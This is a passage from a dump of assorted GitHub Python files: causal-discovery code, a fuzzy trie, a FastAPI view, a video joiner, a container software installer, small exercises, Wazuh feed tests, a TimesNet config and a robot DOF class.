SETTINGS.get_default(njobs=njobs)\n self.gpus = SETTINGS.get_default(gpu=gpus)\n self.verbose = SETTINGS.get_default(verbose=verbose)\n self.nruns = nruns\n\n def predict(self, data, graph=None,\n return_list_results=False):\n \"\"\"Execute SAM on a dataset given a skeleton or not.\n\n Args:\n data (pandas.DataFrame): Observational data for estimation of causal relationships by SAM\n skeleton (numpy.ndarray): A priori knowledge about the causal relationships as an adjacency matrix.\n Can be fed either directed or undirected links.\n Returns:\n networkx.DiGraph: Graph estimated by SAM, where A[i,j] is the term\n of the ith variable for the jth generator.\n \"\"\"\n if graph is not None:\n skeleton = th.Tensor(nx.adjacency_matrix(graph,\n nodelist=list(data.columns)).todense())\n else:\n skeleton = None\n\n assert self.nruns > 0\n if self.gpus == 0:\n results = [run_SAM(data, skeleton=skeleton,\n lr_gen=self.lr,\n lr_disc=self.dlr,\n verbose=self.verbose,\n lambda1=self.lambda1, lambda2=self.lambda2,\n nh=self.nh, dnh=self.dnh,\n train=self.train,\n test=self.test, batch_size=self.batchsize,\n dagstart=self.dagstart,\n dagloss=self.dagloss,\n dagpenalization=self.dagpenalization,\n dagpenalization_increase=self.dagpenalization_increase,\n losstype=self.losstype,\n linear=self.linear,\n hlayers=self.hlayers,\n device='cpu') for i in range(self.nruns)]\n else:\n results = parallel_run(run_SAM, data, skeleton=skeleton,\n nruns=self.nruns,\n njobs=self.njobs, gpus=self.gpus, lr_gen=self.lr,\n lr_disc=self.dlr,\n verbose=self.verbose,\n lambda1=self.lambda1, lambda2=self.lambda2,\n nh=self.nh, dnh=self.dnh,\n train=self.train,\n test=self.test, batch_size=self.batchsize,\n dagstart=self.dagstart,\n dagloss=self.dagloss,\n dagpenalization=self.dagpenalization,\n dagpenalization_increase=self.dagpenalization_increase,\n losstype=self.losstype,\n linear=self.linear,\n hlayers=self.hlayers)\n list_out = [i for i in results if not np.isnan(i).any()]\n try:\n assert len(list_out) > 0\n except AssertionError as e:\n print(\"All solutions contain NaNs\")\n raise(e)\n W = sum(list_out)/len(list_out)\n return nx.relabel_nodes(nx.DiGraph(W),\n {idx: i for idx,\n i in enumerate(data.columns)})\n\n def orient_directed_graph(self, *args, **kwargs):\n \"\"\"Orient a (partially directed) graph.\"\"\"\n return self.predict(*args, **kwargs)\n\n def orient_undirected_graph(self, *args, **kwargs):\n \"\"\"Orient a undirected graph.\"\"\"\n return self.predict(*args, **kwargs)\n\n def create_graph_from_data(self, *args, **kwargs):\n \"\"\"Estimate a causal graph out of observational data.\"\"\"\n return self.predict(*args, **kwargs)\n","repo_name":"haeggee/bacadi","sub_path":"CausalDiscoveryToolbox/cdt/causality/graph/SAM.py","file_name":"SAM.py","file_ext":"py","file_size_in_byte":18769,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"16183205327","text":"from Trie import Trie, TrieNode\nimport heapq\nfrom collections import defaultdict, namedtuple\nfrom functools import lru_cache\n\nclass FuzzyTrie(Trie):\n\t'''\n\tImplements fuzzy matching that allows for single/multiple errors (insertion, deletion, substitution)\n\tDefault is 0 allowed errors, which behaves the same as the regular Trie.traverse, except it returns\n\t[TrieNode] instead of single instance of TrieNode\n\t'''\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.head = TrieNode()\n\n\t@lru_cache(maxsize=1000)\n\tdef match_prefix(self, prefix, allowed_errors: int=0) -> dict:\n\t\t# First must match first char\n\t\tnode = self.head.traverse(prefix[0])\n\t\tif node is None:\n\t\t\treturn dict()\n\t\t# first prefix matched, now fuzzy traverse remaining prefix\n\t\ttraverse_results = node.fuzzy_traverse(prefix[1:], allowed_errors)\n\n\t\t# for each node in traverse results, generate resulting words and store\n\t\t# in dictionary with num_errors as key\n\t\tresult = dict()\n\t\tseen = set()\n\t\tfor num_errors, nodes in traverse_results.items():\n\t\t\tif num_errors not in result:\n\t\t\t\tresult[num_errors] = set()\n\t\t\tfor node in nodes:\n\t\t\t\twords = [node.prefix() + partial for partial in node.words()]\n\t\t\t\twords = set(word for word in words if word not in seen)\n\t\t\t\tresult[num_errors] |= words\n\t\t\t\tseen |= words\n\t\treturn result\n\n\t\t# must match at the first ch in prefix\n\t\tif not prefix:\n\t\t\treturn self.words()\n\t\tif prefix[0] not in self.head.children:\n\t\t\treturn dict()\n\t\ttraverse_results = self.traverse(prefix, allowed_errors)\n\t\tresult = self.head\n\t\tresult = {}\n\t\tfor (num_errors, prefix, node) in traverse_results:\n\t\t\tfor suffix in node.words():\n\t\t\t\tword = prefix + suffix\n\t\t\t\tif word not in result:\n\t\t\t\t\tresult[word] = num_errors\n\t\t\t\telse:\n\t\t\t\t\tresult[word] = min(result[word], num_errors)\n\t\treturn result\n\n# simple unit test\nif __name__ == '__main__':\n\tfuzzy_trie = FuzzyTrie()\n\twords = ['at', 'about', 'attack', 'art', 'fresh', 'church', 'allow', 'ace', 'audio', 'bow', 'but', 'belief', 'try', 'trie', 'turning']\n\tfor word in words:\n\t\tfuzzy_trie.add_word(word)\n\n\tassert set(words) == set(fuzzy_trie.words())\n\tassert 'at' in fuzzy_trie\n\tassert 'belief' in fuzzy_trie\n\tassert 'cat' not in fuzzy_trie\n\tassert len(fuzzy_trie) == len(words)\n\n\tprint(fuzzy_trie.match_prefix('aut', 1).items())\n\n\n\n\t# assert set(trie.match_prefix('a')) == set([s for s in words if s.startswith('a')])\n\t# assert set(trie.match_prefix('at')) == set([s for s in words if s.startswith('at')])\n\t# assert set(trie.match_prefix('tru')) == set([s for s in words if s.startswith('tru')])\n\t# assert set(trie.match_prefix('hello')) == set([s for s in words if s.startswith('hello')])\n\t# assert 'about' in trie\n\t# trie.remove_word('about')\n\t# assert 'about' not in trie\n\t# assert len(trie) == len(words) - 1\n\t# trie.remove_word('but')\n\t# assert len(trie) == len(words) - 2\n\t# assert set(trie.words()) == (set(words) - set(['about', 'but']))\n\t# trie.remove_words(['attack', 'belief', 'not'])\n\t# assert set(trie.words()) == (set(words) - set(['about', 'but', 'attack', 'belief']))\n\t# trie.add_words(['about', 'but', 'attack', 'belief'])\n\t# assert set(words) == set(trie.words())\n\n","repo_name":"chris-kuo/mind-reader","sub_path":"FuzzyTrie.py","file_name":"FuzzyTrie.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"28525409440","text":"from fastapi import APIRouter, responses\nfrom starlette.requests import Request\nfrom starlette.templating import Jinja2Templates\nfrom services import report_service\n\n# includes the in-built templating engine for FastApi\ntemplates = Jinja2Templates('templates')\nrouter = APIRouter()\n\n\n@router.get('/', include_in_schema=False)\nasync def index(request: Request):\n events = await report_service.get_reports()\n data = {'request': request, 'events': events}\n return templates.TemplateResponse(\"home/index.html\", data)\n\n\n# explicitly get favicon from static directory because request failed\n@router.get('/favicon.ico', include_in_schema=False)\ndef favicon():\n return responses.RedirectResponse(url='/static/img/favicon.ico')","repo_name":"Danielatonge/WeatherAPI-FASTAPI","sub_path":"views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10913990284","text":"from moviepy.editor import *\nimport math\n\ntry:\n\tvideo_1 = VideoFileClip(sys.argv[1])\n\tvideo_2 = VideoFileClip(sys.argv[2])\n\tvideo_3 = video_1.subclip(0,math.floor(video_1.duration)*0.8)\n\tvideo_4 = video_2\n\tfinal1 = video_3.resize((1080,1920))\n\tfinal2 = video_4.resize((1080,1920))\n\n\tfinalVideo = concatenate_videoclips([final1,final2])\n\tfinalVideo.write_videofile('final2.mp4',threads=20,fps=60,bitrate=\"2500k\")\nexcept:\n\tprint(\"Usage : python join.py 1.mp4 2.mp4\")","repo_name":"wmhchathuranga/tiktokscrapper","sub_path":"join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71795862544","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport json\nimport glob\nimport os\nimport os.path as osp\nimport shutil\nimport sys\nimport tempfile\n\n\nall_software = {\n 'spm12-standalone': None,\n 'freesurfer': None,\n}\ndefault_software = {\n 'spm12-standalone': None,\n}\nsearch_paths = ['/usr/local', '/drf/local', '/i2bm/local']\n\n\ndef get_thirdparty_software(install_thirdparty='default'):\n '''\n Iterate over thirdparty software, either given in the install_thirdparty\n parameter, or using a default list.\n\n Parameters\n ----------\n install_thirdparty: str\n software to be found. If 'default', the default list\n (``default_software``) will be used instead. If 'all', the complete\n list (``all_software``) will be used. Otherwise it is a coma-\n separated list of software names. Each can be provided a source\n installation directory on the host, separated with a ``=`` sign. Ex::\n\n 'spm12-standalone=/opt/spm12-standalone,freesurfer'\n\n When no path is specified, it will be looked for in a search path list\n (``search_paths``).\n\n Yields\n ------\n sw_path: str\n path of the detected software\n soft_bame: str\n name (and main directory) of the software\n scripts: dict\n scripts that should be run inside the container to install the software\n or set it up in other software (like axon). The dict keys are the\n install path inside the container, and the value is the script to be\n run there, in a string.\n env: dict\n environment variables to be set in the container in order to make the\n software work.\n\n '''\n if install_thirdparty.lower() == 'all':\n software = all_software\n elif install_thirdparty.lower() == 'default':\n software = default_software\n elif install_thirdparty.startswith('file://'):\n filename = install_thirdparty[7:]\n with open(filename) as f:\n software = json.load(f)\n else:\n software_list = [x.strip() for x in install_thirdparty.split(',')]\n software = {}\n for soft_name in software_list:\n sw_path1 = [x.strip() for x in soft_name.split('=', 1)]\n sw_path = None\n if len(sw_path1) == 2:\n soft_name, sw_path = sw_path1\n software[soft_name] = sw_path\n for soft_name, sw_path in software.items():\n if sw_path is None:\n for sp in search_paths:\n if osp.exists(osp.join(sp, soft_name)):\n sw_glob = [osp.join(sp, soft_name)]\n else:\n sw_glob = glob.glob(osp.join(sp, '%s*', soft_name))\n if sw_glob:\n sw_path = osp.realpath(sorted(sw_glob)[0])\n break\n if sw_path is None:\n raise ValueError(\n 'Could not find location of %s. Please specify it as '\n '%s=<path>' % (soft_name, soft_name))\n\n init_fn = getattr(sys.modules[__name__],\n 'get_%s_init' % soft_name.replace('-', '_'),\n None)\n if init_fn:\n scripts = init_fn()\n else:\n scripts = {}\n\n env_fn = getattr(sys.modules[__name__],\n 'get_%s_env' % soft_name.replace('-', '_'),\n None)\n if env_fn:\n env = env_fn()\n else:\n env = {}\n\n yield sw_path, soft_name, scripts, env\n\n\ndef install_thirdparty_software(install_thirdparty, builder):\n temps = []\n try:\n env = {}\n if install_thirdparty not in (None, 'none', 'None', 'NONE'):\n for source_dir, symlink_name, setup_scripts, env_dict \\\n in get_thirdparty_software(install_thirdparty):\n print('installing %s from %s...' % (symlink_name, source_dir))\n if source_dir.endswith('.tar') \\\n or source_dir.endswith('.tar.gz') \\\n or source_dir.endswith('.tar.bz2'):\n builder.extract_tar(source_dir, '/usr/local')\n source_dir = '.tar'.join(source_dir.split('.tar')[:-1])\n else:\n builder.copy_root(source_dir, '/usr/local')\n if symlink_name and osp.basename(source_dir) != symlink_name:\n builder.symlink(osp.basename(source_dir),\n osp.join('/usr/local', symlink_name))\n for script_file, script in setup_scripts.items():\n d = tempfile.mkdtemp(prefix='casa_distro_script')\n temps.append(d)\n tmp_name = osp.join(d, osp.basename(script_file))\n with open(tmp_name, 'w') as f:\n f.write(script)\n os.chmod(tmp_name, 0o755)\n dest_dir = osp.dirname(script_file)\n builder.run_root(('if [ ! -d \"{dest_dir}\" ]; then '\n 'mkdir -p \"{dest_dir}\"; '\n 'fi').format(dest_dir=dest_dir))\n builder.copy_root(tmp_name, dest_dir)\n builder.run_root('chmod a+rx \"{}\"'.format(script_file))\n builder.run_user(script_file)\n env.update(env_dict)\n\n if env:\n builder.environment(env)\n except Exception:\n for d in temps:\n shutil.rmtree(d)\n raise\n return temps\n\n\ndef get_spm12_standalone_init():\n ''' SPM setup script for Axon\n\n Note about SPM standalone:\n\n Here we copy an already installed directory, which should contain both the\n SPM standalone distribution, and the matlab MCR. We have used (for now)\n SPM12-7771 and MCR v97 as in:\n https://github.com/spm/spm-docker/blob/main/matlab/singularity.def\n\n The MCR is \"lightened\" using only the core + numerics packages, not the\n whole MCR (thus is 2.6 GB instead of 5.8 GB, which will increase in v911\n and later).\n See:\n https://github.com/brainvisa/casa-distro/issues/268\n\n We could have run the installation procedure the \"official\" way as in the\n spm-docker project, but this would involve systematic download of the SPM\n distribution and of the full MCR distribution at each container build,\n which takes too much time. So for now SPM has to be pre-installed on the\n host system. We could improve the procedure and download / install it only\n if it is not already present, but this would need to handle installation\n paths, permissions (sudo to install in /usr/local for instance) etc, which\n we don't want to deal with at the moment.\n '''\n # init script for axon\n spm_script = '''#!/usr/bin/env python\n\nimport glob\nimport os\nimport sys\n\nsys.path.insert(0, '/casa/install/python')\ntry:\n from brainvisa.configuration import neuroConfig\nexcept ImportError:\n # no axon in the image\n pass\n\nconf = list(neuroConfig.readConfiguration(neuroConfig.mainPath, None, ''))\nsiteOptionFile = conf[0][1]\nif siteOptionFile and os.path.exists(siteOptionFile):\n neuroConfig.app.configuration.load(siteOptionFile)\n\nneuroConfig.app.configuration.SPM.spm12_standalone_path = \\\n '/usr/local/spm12-standalone'\nneuroConfig.app.configuration.SPM.spm12_standalone_command = \\\n '/usr/local/spm12-standalone/run_spm12.sh'\nmcr_paths = glob.glob('/usr/local/spm12-standalone/mcr/v*')\nif len(mcr_paths) != 1:\n raise RuntimeError(\"Cannot find the MATLAB Compiler Runtime in the \"\n \"expected location, please check your \"\n \"install_thirdparty setting.\")\nneuroConfig.app.configuration.SPM.spm12_standalone_mcr_path = mcr_paths[0]\n\nfrom pprint import pprint\npprint(neuroConfig.app.configuration)\nneuroConfig.app.configuration.save(siteOptionFile)\n'''\n scripts = {'/casa/install/templates/brainvisa/spm.py': spm_script}\n\n return scripts\n\n\ndef get_spm12_standalone_env():\n ''' SPM env variables\n '''\n # env variables for SPM\n # (see https://github.com/brainvisa/casa-distro/issues/268)\n env = {'SPM_HTML_BROWSER': '0'}\n return env\n\n\ndef get_freesurfer_init():\n ''' Freesurfer setup script for Axon\n '''\n # init script for axon\n fs_script = '''#!/usr/bin/env python\n\nimport sys\nsys.path.insert(0, '/casa/install/python')\ntry:\n from brainvisa.configuration import neuroConfig\n import glob\n import os\n from brainvisa.configuration.freesurfer_configuration import \\\n FreeSurferConfiguration\n\n conf = list(neuroConfig.readConfiguration(neuroConfig.mainPath, None, ''))\n siteOptionFile = conf[0][1]\n if siteOptionFile and os.path.exists(siteOptionFile):\n neuroConfig.app.configuration.load(siteOptionFile)\n\n if 'freesurfer' not in neuroConfig.app.configuration.signature:\n neuroConfig.app.configuration.add('freesurfer',\n FreeSurferConfiguration())\n\n neuroConfig.app.configuration.freesurfer.freesurfer_home_path = \\\n '/usr/local/freesurfer'\n neuroConfig.app.configuration.freesurfer.subjects_dir_path = \\\n '/usr/local/freesurfer/subjects'\n\n neuroConfig.app.configuration.save(siteOptionFile)\n\nexcept ImportError:\n # no axon in the image\n pass\n'''\n scripts = {'/casa/install/templates/brainvisa/freesurfer.py': fs_script}\n\n return scripts\n\n\ndef get_freesurfer_env():\n ''' Freesurfer env variables\n '''\n # env variables for Freesurfer\n env = {'FREESURFER_HOME': '/usr/local/freesurfer'}\n return env\n","repo_name":"brainvisa/casa-distro","sub_path":"python/casa_distro/thirdparty.py","file_name":"thirdparty.py","file_ext":"py","file_size_in_byte":9642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"10893056556","text":"# design a calculator which solves all problems correctly except for the given cases\r\n# these are the exceptions 45*3=555, 56+9=77, 56/6=4\r\n\r\n# function defining the work of calculator \r\ndef cal(operator, var1, var2):\r\n if operator == '+':\r\n if var1 == 56 and var2 == 9:\r\n print('result = 77')\r\n else:\r\n print(\"result = \", (var1 + var2))\r\n elif operator == '-':\r\n print(\"result =\", var1 - var2 )\r\n elif operator == '*':\r\n if var1 == 45 and var2 ==3:\r\n print(\"result = 555\")\r\n else : \r\n print(\"result =\",(var1 * var2))\r\n elif operator == '/':\r\n if var1 == 56 and var2 == 6: \r\n print(\"result = 4\")\r\n else:\r\n print(\"result = \", (var1/ var2))\r\n else :\r\n print('this operation is not available')\r\n\r\n# iterate it until prompted so \r\nans = 'y'\r\nwhile(ans == 'y'):\r\n operator = input(\"Enter the operator for operation you want to perform = \")\r\n var1,var2 = int(input(\"Enter the first variable = \")), int(input(\"Enter the second variable = \"))\r\n cal(operator, var1, var2)\r\n ans = input(\"Do you want another result(y/n) = \")","repo_name":"SameerVanjari/PythonProjects","sub_path":"Faulty_calc.py","file_name":"Faulty_calc.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71176","text":"over_20kg_price, baggage_weight = float(input()), float(input())\nday_to_trip, bags_count = int(input()), int(input())\ncost = 0\nif baggage_weight < 10:\n cost = over_20kg_price * 20/100\nelif 10 <= baggage_weight <= 20:\n cost = over_20kg_price * 50/100\nelif baggage_weight > 20:\n cost = over_20kg_price\n\nif day_to_trip < 7:\n cost += cost * 40/100\nelif 7 <= day_to_trip <= 30:\n cost += cost * 15/100\nelif day_to_trip > 30:\n cost += cost * 10/100\n\nprint(f\" The total price of bags is: {(cost*bags_count):.2f} lv. \")","repo_name":"koevsky/SoftUni","sub_path":"Python-Basics/Exams/3.PB Exam/02. Add Bags.py","file_name":"02. Add Bags.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29452657756","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTensorFlow 实现反向传播,通过调节模型变量来最小化损失函数\n 回归算法的例子,拟合一个平面\n 分类算法的例子,将正态分布分割成不同的两类\n\nWangKai 编写于 2019/04/30 13:00:00 (UTC+08:00)\n 中国科学院大学, 北京, 中国\n 地球与行星科学学院\n Comments, bug reports and questions, please send to:\n wangkai185@mails.ucas.edu.cn\n\nVersions:\n 最近更新: 2019/04/30\n 算法构建,测试\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.framework import ops\n\n\"\"\" 回归算法的例子,拟合一个平面 \"\"\"\n# 初始化计算图\nops.reset_default_graph()\nsess = tf.Session()\n# 使用 NumPy 生成假数据(phony data), 总共 100 个��\nxy_vals = np.float32(np.random.rand(2, 100)) # 随机输入二维因变量\nz_vals = np.dot([0.100, 0.200], xy_vals) + 0.300 # 平面 z=0.1x+0.2y+0.3\n# 创建占位符\nxy_data = tf.placeholder(shape=[2, 100], dtype=tf.float32)\nz_target = tf.placeholder(shape=[100], dtype=tf.float32)\n# 创建变量 W,b 作为拟合参数\nW = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0))\nb = tf.Variable(tf.zeros([1]))\n# 创建计算图操作,构造线性模型\nz = tf.matmul(W, xy_vals) + b\n# 创建 L2 正则损失函数\nloss = tf.reduce_mean(tf.square(z - z_vals))\n# 声明变量的优化器,标准梯度下降法,最小化方差\n# 小学习率收敛慢、精度高;大学习率收敛快,精度低\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.5)\ntrain = optimizer.minimize(loss)\n# 初始化变量\ninit = tf.global_variables_initializer()\n# 启动图\nsess.run(init)\n# 训练算法,拟合平面。迭代 201 次,每 20 次迭代打印返回结果。\n# 每次迭代将所有点坐标传入计算图中。TensorFlow 将自动地计算损失,调整 W,b 偏差来最小化损失\nprint('Regression example:')\nfor step in range(0, 200):\n sess.run(train, feed_dict={xy_data: xy_vals, z_target: z_vals})\n if (step+1)%20 == 0:\n print('Step #' + str(step+1) + ': W = ' + str(sess.run(W)) + '; b = ' + \n str(sess.run(b)) + '; Loss = ' + \n str(sess.run(loss, feed_dict={xy_data: xy_vals, z_target: z_vals})))\n# 得到最佳拟合结果应接近于 W = [[0.100 0.200]]; b = [0.300]\n\n\"\"\" 分类算法的例子,将正态分布分割成不同的两类 \"\"\"\n# 重置计算图\nops.reset_default_graph()\nsess = tf.Session()\n# 从正态分布 (N(-1,1), N(3,1)) 生成数据,总共 100 个点\nx_vals = np.concatenate((np.random.normal(-1, 1, 50), np.random.normal(3, 1, 50)))[:,np.newaxis]\n# 创建目标标签,N(-1,1) 为 '0' 类,N(3,1) 为 '1' 类,各 50 个点\ny_vals = np.concatenate((np.repeat(0., 50), np.repeat(1., 50)))[:,np.newaxis]\n# 创建占位符,一次使用一个随机数据\nx_data = tf.placeholder(shape=[100, 1], dtype=tf.float32)\ny_target = tf.placeholder(shape=[100, 1], dtype=tf.float32)\n# 创建变量 A 作为最佳聚类边界的负值,初始值为 10 附近的随机数,远离理论值 -(-1+3)/2 = -1\nA = tf.Variable(tf.random_normal(mean=10, shape=[1]))\n# 创建计算图操作,模型算法是 sigmoid(x+A)\nmy_output = tf.add(x_data, A)\n# 创建损失函数,使用 Sigmoid 交叉熵损失函数(Sigmoid cross entropy loss)\nxentropy = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=my_output, labels=y_target))\n# 声明变量的优化器,标准梯度下降法,最小化交叉熵\nmy_opt = tf.train.GradientDescentOptimizer(0.01)\ntrain_step = my_opt.minimize(xentropy)\n# 初始化变量\ninit = tf.global_variables_initializer()\nsess.run(init)\n# 通过随机选择的数据迭代 101 次,相应地更新变量 A。每迭代 10 次打印出变量 A 和损失的返回值\nprint('\\nClassification example:')\nfor i in range(100):\n sess.run(train_step, feed_dict={x_data: x_vals, y_target: y_vals})\n if (i+1)%10 == 0:\n print('Step #' + str(i+1) + ': A = ' + str(sess.run(A)) + '; Loss = ' +\n str(sess.run(xentropy, feed_dict={x_data: x_vals, y_target: y_vals})))\n# 得到最佳拟合结果应趋近于 A = [-1.]\n","repo_name":"GeoKylin/Step-By-Step-For-TensorFlow","sub_path":"TensorFlow_Graph/tensorflow_back_propagation.py","file_name":"tensorflow_back_propagation.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28181856033","text":"import itertools\nimport os\n\nimport pytest\nimport wazuh_testing.vulnerability_detector as vd\nfrom wazuh_testing.tools import LOG_FILE_PATH\nfrom wazuh_testing.tools.configuration import load_wazuh_configurations\nfrom wazuh_testing.tools.file import truncate_file, read_json_file, write_json_file\nfrom wazuh_testing.tools.monitoring import FileMonitor\nfrom wazuh_testing.tools.services import control_service\n\n# Marks\npytestmark = pytest.mark.tier(level=2)\n\n# Variables\ncurrent_test_path = os.path.dirname(os.path.realpath(__file__))\ntest_data_path = os.path.join(current_test_path, '..', '..', 'data')\nconfigurations_path = os.path.join(test_data_path, 'configuration', 'test_feeds', vd.INVALID_MSU_FEEDS_CONF)\ncustom_msu_json_feed_path = os.path.join(test_data_path, 'feeds', vd.CUSTOM_MSU_JSON_FEED)\n\nwazuh_log_monitor = FileMonitor(LOG_FILE_PATH)\n\n# Set configuration\nparameters = [{'MSU_JSON_PATH': custom_msu_json_feed_path + \"$\"}]\nids = ['MSU_configuration']\n\n# MSU fields to check\ntest_data = [\n {\"field\": \"patch\", \"type\": [str, int, list]},\n {\"field\": \"product\", \"input\": \"\", \"type\": [str, int, list]},\n {\"field\": \"restart_required\", \"type\": [str, int, list]},\n {\"field\": \"subtype\", \"type\": [str, int, list]},\n {\"field\": \"title\", \"type\": [str, int, list]},\n {\"field\": \"url\", \"type\": [str, int, list]}\n]\n\ntest_data_ids = [f\"field: {item['field']}, value:{value}\" for item in test_data for value in\n vd.CUSTOM_INPUT_TEST_VALUES]\n\n# Configuration data\nconfigurations = load_wazuh_configurations(configurations_path, __name__, params=parameters)\n\n\n@pytest.fixture(scope='module', params=configurations, ids=ids)\ndef get_configuration(request):\n \"\"\"Get configurations from the module.\"\"\"\n return request.param\n\n\n@pytest.fixture\ndef modify_feed(test_data, custom_input, request):\n \"\"\"\n Modify the MSU feed, setting a test field value\n \"\"\"\n backup_data = read_json_file(custom_msu_json_feed_path)\n\n data = read_json_file(custom_msu_json_feed_path)\n\n modified_data = dict(data['vulnerabilities']['CVE-010'][0])\n\n modified_data[test_data['field']] = custom_input\n\n data['vulnerabilities']['CVE-010'][0] = modified_data\n\n write_json_file(custom_msu_json_feed_path, data)\n\n vd.clean_vuln_and_sys_programs_tables()\n\n control_service('restart', daemon='wazuh-modulesd')\n\n vd.set_system(system='Windows10')\n\n yield\n\n write_json_file(custom_msu_json_feed_path, backup_data)\n\n vd.clean_vuln_and_sys_programs_tables()\n\n truncate_file(LOG_FILE_PATH)\n\n\ndef test_no_feed_changes(clean_vuln_tables, get_configuration, configure_environment, restart_modulesd):\n \"\"\"Check if the feed is imported successfully by default\"\"\"\n vd.check_feed_imported_successfully(wazuh_log_monitor=wazuh_log_monitor, log_system_name=vd.MSU_LOG,\n expected_vulnerabilities_number=0)\n\n\n@pytest.mark.parametrize('test_data, custom_input', itertools.product(test_data, vd.CUSTOM_INPUT_TEST_VALUES),\n ids=test_data_ids)\ndef test_invalid_values_msu_feed(test_data, custom_input, clean_vuln_tables, get_configuration, configure_environment,\n modify_feed):\n \"\"\"\n Check if vulnerability detector behaves as expected when importing MSU feed with wrong field values\n \"\"\"\n # If the field is \"key\" and the input type is not the field type, then look for error messages\n vd.check_feed_imported_successfully(wazuh_log_monitor=wazuh_log_monitor, log_system_name=vd.MSU_LOG,\n expected_vulnerabilities_number=0)\n\n vd.check_if_modulesd_is_running()\n","repo_name":"kargil-thakur/wazuh-qa","sub_path":"tests/integration/test_vulnerability_detector/test_feeds/msu/test_invalid_values_msu_feed.py","file_name":"test_invalid_values_msu_feed.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"22039655357","text":"import torch\n\nclass SchedulerConfig:\n def __init__(self):\n # STARTS from lr goes down to eta_min in T_0 \n self.CosineAnnealingWarmRestarts = {'T_0': 10, 'T_mult': 1, 'eta_min': 0.0005}\n self.StepLR = {'step_size': 10, 'gamma': 0.1}\n self.ExponentialLR = {'gamma': 0.95}\n\n #steps_per_epoch should be set to number of batches , epochs should be total number of epochs \n # Starts from low lr to max lr \n self.OneCycleLR = {'max_lr': 0.01, 'steps_per_epoch': 10, 'epochs': 20} \n\n self.CyclicLR = {'base_lr': 0.001, 'max_lr': 0.01, 'step_size_up': 5,'step_size_down':5, 'mode': 'triangular'} \n\n def get_params(self, scheduler_name):\n return getattr(self, scheduler_name, None)\n\nnum_features = 3\ntarget_name = '평균기온'\n\nclass Config:\n def __init__(self):\n # ==================== Task name ================ #\n self.task_name = 'short_term_forecast'\n # Output features and c_out should be the same when the task is anomaly_detection\n\n # =================== Datasets Shape================== #\n self.seq_len = 365\n self.window_shift = 1\n self.enc_in = num_features # Features\n\n # ================== MODEL ====================== #\n self.d_model = 20 # Embedding dimension\n self.top_k = 3 # FFT frequency\n self.d_ff = 20 # Output layer dimension\n self.num_kernels = 6 # inception block에서 / If using dcvn set it to 3\n self.dropout = 0.1 # Dropout rate\n self.e_layers = 1 # num Timeblock\n self.label_len = num_features # Features\n\n self.target_col = target_name # Name of target column\n self.cnn_type = 'inceptionv1' # dcvn, inceptionv1, inceptionv2, res_dcvn, res_inceptionv1, res_inceptionv2\n\n # ================= Output shape ================= #\n self.pred_len = 358 # Prediction length\n self.c_out = 1 # Output feature\n\n # ================= Scheduler Configurations ========= #\n self.scheduler_config = SchedulerConfig()\n self.scheduler_name = 'CosineAnnealingWarmRestarts' #'CosineAnnealingWarmRestarts', 'StepLR', 'ExponentialLR', 'OneCycleLR', 'CyclicLR'\n self.scheduler_update_type = 'batch' # epoch, batch \n\nconfigs = Config()\n","repo_name":"edwardhan925192/TimesNet","sub_path":"times_config.py","file_name":"times_config.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1059592519","text":"# from opsoro.hardware import Hardware\nimport math\nimport random\nimport time\n\nfrom scipy import interpolate\n\nfrom opsoro.animate import Animate\nfrom opsoro.console_msg import *\n\n\ndef constrain(n, minn, maxn): return max(min(maxn, n), minn)\n\n\nclass DOF(object):\n def __init__(self, name, neutral=0.0, poly=None):\n \"\"\"\n DOF class.\n\n :param string name: name of the DOF.\n :param float neutral: neutral dof position.\n :param list poly: 20 dof values linked to emotions.\n \"\"\"\n\n self.name = name\n self.tags = []\n self.value = neutral\n self.to_value = neutral\n\n # Dict to store any extra data from YAML files\n self.data = {}\n\n # # List of overlay functions\n # # def my_overlay(dofpos, dof):\n # # new_dof_pos = dofpos\n # # return my_new_pos\n # self.overlays = []\n\n self._neutral = None\n self._interp_poly = None\n\n self._anim = None\n\n # Update control polygon\n self.set_control_polygon(neutral, poly)\n\n self.last_set_time = int(round(time.time() * 1000))\n self.last_set_value = neutral\n\n def config(self, **args):\n pass\n\n def __repr__(self):\n return \"DOF(name=%s, neutral=%.2f, poly={...})\" \\\n % (self.name, self._neutral)\n\n def set_control_polygon(self, neutral=0.0, poly=None):\n \"\"\"\n Sets the control polygon, 20 dof values are linked to certain emotions.\n\n :param float neutral: neutral dof position.\n :param list poly: 20 dof values linked to emotions.\n \"\"\"\n\n self._neutral = constrain(neutral, -1.0, 1.0)\n\n if poly is None or len(poly) == 0:\n self._interp_poly = lambda x: self._neutral\n else:\n dofs = map(lambda x: float(x), poly)\n\n # Fixed phis, this is currently always the same\n phis = [\n -3.1415926535897931, -2.8108986900540254, -2.4802047265182576,\n -2.1495107629824899, -1.8188167994467224, -1.4881228359109546,\n 